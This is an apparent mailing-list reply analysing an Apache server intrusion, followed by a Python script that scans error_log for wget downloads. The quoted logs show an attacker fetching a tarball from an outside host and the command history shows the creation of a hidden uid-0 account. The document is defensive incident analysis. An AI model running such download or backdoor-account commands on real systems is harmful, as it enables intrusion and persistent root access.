On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
> Follows found in error_log of apache
> --09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
>            => `vulturu.tgz'
> Resolving www.vulturul.org... done.
> Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 9,432 [application/x-tar]
>
>     0K ......... 100% 13.69 KB/s
>
> 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.
> Also Found his command history:
> id
> /usr/sbin/adduser vulturul -u0 -g0 -M;
He has root access but is not sure about that?
At least two problems. Execution of commands as user wwwrun and
local root compromise.
I hope the box has been disconnected from the network already.
--
Stefan Tichy
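
The check described above, as an added example that is not part of the original message: it flags error_log lines that lack Apache's bracketed timestamp prefix (stderr of a child process such as a CGI) and extracts wget transfers from them. The function names and the two Apache log lines are constructed; the wget lines follow the output quoted in the message, and the `[date] [level]` prefix format is an assumption about the server's log format.

```python
import re

# Apache's own error_log entries start with "[date] [level]" (assumed format).
APACHE_LINE = re.compile(r"^\[\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d(?:\.\d+)? \d{4}\] \[")
# wget transfer header and completion line, as quoted in the message.
WGET_START = re.compile(r"^--\d\d:\d\d:\d\d--\s+(?P<url>\S+)")
WGET_SAVED = re.compile(r"^\d\d:\d\d:\d\d \(.*\) - `(?P<file>[^']+)' saved \[(?P<size>\d+)/\d+\]")

# Constructed sample: the first and last lines are invented Apache entries.
SAMPLE = """\
[Wed Sep  3 09:40:58 2003] [error] [client 192.0.2.10] File does not exist: /srv/www/htdocs/favicon.ico
--09:41:10--  http://www.vulturul.org/vulturul/vulturu.tgz
           => `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]

    0K .........                                             100%   13.69 KB/s

09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
[Wed Sep  3 09:42:03 2003] [notice] caught SIGTERM, shutting down
""".splitlines()

def stray_lines(lines):
    """Line numbers of non-empty lines that Apache itself did not write."""
    return [n for n, line in enumerate(lines, 1)
            if line.strip() and not APACHE_LINE.match(line)]

def find_downloads(lines):
    """One dict per wget transfer whose output leaked into the log."""
    hits, current = [], None
    for n, line in enumerate(lines, 1):
        if APACHE_LINE.match(line):
            continue  # ordinary server message
        m = WGET_START.match(line)
        if m:
            current = {"line": n, "url": m.group("url"), "file": None, "size": None}
            hits.append(current)
            continue
        m = WGET_SAVED.match(line)
        if m and current is not None:
            current.update(file=m.group("file"), size=int(m.group("size")))
            current = None  # transfer finished
    return hits

if __name__ == "__main__":
    print(stray_lines(SAMPLE), find_downloads(SAMPLE))
```

Any non-empty result from `stray_lines` on a real log is worth tracing back to the script that produced it, using the access_log entries around the same time.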